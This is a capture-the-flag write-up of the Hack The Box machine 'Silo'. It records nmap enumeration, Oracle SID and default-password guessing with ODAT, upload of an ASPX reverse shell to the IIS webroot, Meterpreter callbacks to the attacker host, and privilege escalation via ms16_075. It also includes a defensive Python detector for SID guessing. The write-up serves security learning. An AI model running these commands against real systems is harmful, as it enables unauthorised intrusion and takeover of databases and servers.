# Silo

### Initial Enumeration

```bash
# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-07-21 16:37:20
|_  start_date: 2019-07-21 16:20:43

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   231.02 ms 10.10.14.1
2   265.03 ms 10.10.10.82

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds
```

So there are 3 web servers, 3 SMB ports, and 1 Oracle port. I ran gobuster on all the web servers but found nothing, so I dropped that vector. On the SMB ports, the guest account was disabled and I had no other credentials, so I dropped that too. The only port left was the Oracle port. I found CVE-2012-1675 and its exploit, but I was not able to exploit it; either the server was not vulnerable or I had something misconfigured, so the path beyond this was manual. However, I found an Oracle pentesting kit on GitHub which was useful throughout the complete operation.

[quentinhardy/odat on GitHub](https://github.com/quentinhardy/odat)

First, find all valid database instances (SIDs) served by this listener.

```bash
./odat.py sidguesser -s 10.10.10.82 -p 1521
```

It found XE and a few other valid SIDs; however, I chose to focus on XE.
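From the listener's side, the SID guessing above shows up as a burst of TNS-12505 ("listener does not currently know of SID") rejections from a single source host. The following detector is an added example, not code from the write-up or from ODAT; it parses lines constructed in the general shape of Oracle listener.log establish entries (the sample is constructed, not captured from the box) and flags any host refused for several distinct unknown SIDs within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the general shape of Oracle listener.log "establish"
# entries (status code last; 12505 = unknown SID). Not captured from the box.
SAMPLE_LISTENER_LOG = """\
21-JUL-2019 16:50:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=45601)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:50:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=45602)) * establish * PROD * 12505
21-JUL-2019 16:50:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=45603)) * establish * TEST * 12505
21-JUL-2019 16:50:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=45604)) * establish * XE * 0
21-JUL-2019 16:51:10 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=51000)) * establish * XE * 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]+)\).*?"
    r"\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\).*?"
    r" \* establish \* \S+ \* (?P<status>\d+)\s*$"
)

def parse_listener_log(text):
    """Return (timestamp, source_host, sid, status) per establish line; continuation lines (e.g. the TNS-12505 text) are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            events.append((ts, m["host"], m["sid"], int(m["status"])))
    return events

def find_sid_guessing(text, window_seconds=60, min_unknown=3):
    """Map source host -> sorted refused SIDs for hosts that hit >= min_unknown distinct unknown SIDs inside one window."""
    rejected = defaultdict(list)
    for ts, host, sid, status in parse_listener_log(text):
        if status == 12505:
            rejected[host].append((ts, sid))
    flagged = {}
    for host, attempts in rejected.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Advance the window start until the span fits in window_seconds
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({sid for _, sid in attempts[start:end + 1]}) >= min_unknown:
                flagged[host] = sorted({sid for _, sid in attempts})
                break
    return flagged
```

The legitimate client on 10.10.10.50 connects by a known service name and is never flagged; the single-source burst of unknown SIDs is.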

Next, check whether any default credentials work on this database.

```bash
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_lower.txt
```

NOTE: I checked both UPPERCASE and LOWERCASE variations, as 11g stores case-sensitive passwords by default. Found `scott:tiger` to be a set of valid credentials.

The next task was to check whether this account holds SYSDBA or SYSOPER on this database. I used Docker to run sqlplus and check this.

```bash
# Try the discovered credentials with each privileged role; the connection
# only succeeds for a role the account actually holds.
docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus
```

It turns out that the user we had was a SYSDBA. One of ODAT's modules lets us put a file on the server in a directory of our choosing. As there are web servers running, we can be sure that the directory `C:\Inetpub\wwwroot` exists on the system, so I chose to upload my MSFvenom ASPX shell there and get a reverse shell.

```bash
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' shell.aspx ../shell.aspx --sysdba
```

```bash
[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SILO
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
```

### User Own

```bash
c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***
```

### Root Own

```bash
msf5 exploit(multi/handler) > search local_exploit_suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530
```

```bash
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***
```

### Learning Outcome

Setting up MSF for an Oracle pentest sucks; ODAT was a real life saver. Oracle pentesting is real fun.

